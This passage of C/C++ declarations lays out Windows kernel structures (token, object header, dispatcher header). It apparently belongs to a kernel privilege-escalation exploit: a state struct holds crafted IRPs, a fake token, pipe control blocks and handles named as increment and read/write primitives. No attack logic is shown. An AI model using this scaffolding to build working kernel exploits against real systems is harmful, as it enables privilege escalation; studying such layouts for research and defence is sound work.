//0x448
VOID* TrustLevelSid; //0x450
struct _TOKEN* TrustLinkedToken; //0x458
VOID* IntegrityLevelSidValue; //0x460
struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468
struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470
struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478
struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480
VOID* SessionObject; //0x488
// Start of the variable-length area that follows the fixed fields
// (VariableLength above gives its size).
ULONGLONG VariablePart; //0x490
};
//0x38 bytes (sizeof) in the kernel definition, where Body is an 8-byte
// placeholder. Here Body is a complete struct _TOKEN (0x498 bytes), so this
// declaration is 0x30 + sizeof(struct _TOKEN) and models an object header with
// its token body laid out contiguously behind it.
struct _OBJECT_HEADER
{
LONGLONG PointerCount; //0x0
union
{
LONGLONG HandleCount; //0x8
VOID* NextToFree; //0x8
};
struct _EX_PUSH_LOCK Lock; //0x10
UCHAR TypeIndex; //0x18
union
{
UCHAR TraceFlags; //0x19
struct
{
UCHAR DbgRefTrace : 1; //0x19
UCHAR DbgTracePermanent : 1; //0x19
};
};
UCHAR InfoMask; //0x1a
union
{
UCHAR Flags; //0x1b
struct
{
UCHAR NewObject : 1; //0x1b
UCHAR KernelObject : 1; //0x1b
UCHAR KernelOnlyAccess : 1; //0x1b
UCHAR ExclusiveObject : 1; //0x1b
UCHAR PermanentObject : 1; //0x1b
UCHAR DefaultSecurityQuota : 1; //0x1b
UCHAR SingleHandleEntry : 1; //0x1b
UCHAR DeletedInline : 1; //0x1b
};
};
ULONG Reserved; //0x1c
union
{
struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20
VOID* QuotaBlockCharged; //0x20
};
VOID* SecurityDescriptor; //0x28
// Object body: the full token layout inlined, not the kernel's 8-byte QUAD.
struct _TOKEN Body; //0x30
};
// Shared state bag: the buffers, crafted structures, handles and kernel
// addresses that the different stages pass between them. Every member is
// filled in elsewhere (not in view); nothing here records ownership, so which
// code frees the buffers and closes the six HANDLEs cannot be told from this
// declaration. Referring to `_IRP`, `_TOKEN` etc. without the `struct` keyword
// is C++ only.
struct mm {
void* fake_data_entry;
void* input;
_IRP* crafted_irp;
IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;
void* p_mem_0x30;
void* p_mem_0xD0_2;
_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;
ACL* VariablePartDefaultDacl;
ACL* VariablePartDefaultDacl2;
_ERESOURCE* TokenLock;
void* PrimaryGroup;
// Presumably 0x30 + sizeof(_TOKEN), matching struct _OBJECT_HEADER above --
// set elsewhere, not in view.
int sizeOfClientTokenAndObjectHeader;
PSEP_SID_VALUES_BLOCK TokenSidValues;
_SECURITY_CLIENT_CONTEXT* security_client_context;
_SEP_LOGON_SESSION_REFERENCES* LogonSession;
_TOKEN* fakeToken;
void *pipe_100_im_control_block;
void* pipe_100_rw_control_block;
void* p_mem_Pipe_hToPipe_1000_rw;
void* p_mem_Pipe_hToPipe_1000_rw_2;
// Named-pipe and file handles; IM/RW suffixes distinguish the two pairs.
HANDLE hPipeIM;
HANDLE hPipeRW;
HANDLE hFileIM;
HANDLE hFileRW;
HANDLE IncPrimitiveTOKEN;
HANDLE RWPrimitiveTOKEN;
};
//0x18 bytes (sizeof)
struct _DISPATCHER_HEADER
{
union
{
volatile LONG Lock; //0x0
LONG LockNV; //0x0
struct
{
UCHAR Type; //0x0
UCHAR Signalling; //0x1
UCHAR Size; //0x2
UCHAR Reserved1; //0x3
};
struct
{
UCHAR TimerType; //0x0
union
{
UCHAR TimerControlFlags; //0x1
struct
{
UCHAR Absolute : 1;